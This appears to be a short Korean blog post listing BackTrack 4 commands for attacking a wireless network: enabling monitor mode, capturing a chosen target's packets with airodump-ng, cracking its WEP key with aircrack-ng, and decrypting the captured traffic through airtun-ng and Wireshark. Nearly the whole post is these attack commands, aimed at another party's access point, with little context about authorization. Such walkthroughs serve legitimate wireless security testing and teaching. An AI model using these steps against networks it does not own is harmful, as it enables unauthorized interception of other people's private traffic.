< 사용된 도구들 >
*운영체제 : backtrack4
*사용된 프로그램 : aircrack, wireshark
#ifconfig wlan0 promisc
(무선랜을 promiscuous 모드로 활성화)
#airmon-ng start wlan0
(모니터용 무선랜 활성화)
#iwlist wlan0 scanning
(무선랜 구성 알아보기)
<무선랜 정보모으기>
#airodump-ng -w [파일이름] mon0
<특정상대방 무선랜 지정하여 무선랜 패킷모으기>
#airodump-ng --bssid [상대BSSID] -c [상대CH] -w [파일이름] mon0
wireshark등을 이용하여 cap 파일 열어서 분석
<와이어 샤크를 통한 암호화된 내용들을 보기...>
가. airtun-ng --h (WEP키로 암호화 된 내용을 복호화)
1) 무선랜 캡쳐한 내용 wep암호찾아내기
aircrack-ng [파일이름].cap
2) airtun-ng 실행 (AP의 MAC 주소, WEP KEY 정보)
3) tunnel 인터페이스(가상인터페이스)가 생성됨 : at0
나. airtun-ng -a [BSSID] -w [Wepkey] wlan0
다. ifconfig at0 up (인터페이스 업 시킨다.)
라. wireshark로 본다.
'시스템 > linux' 카테고리의 다른 글
IFS(Inter File Separator) (0) | 2011.05.04 |
---|---|
로그 명령어 및 로그파일 위치 (0) | 2011.05.04 |
해당 사용자 바로 차단 (0) | 2011.04.12 |
쉘 (Shell) (0) | 2011.03.05 |
PAM ( Pluggable Authentication Modules ) (0) | 2011.03.04 |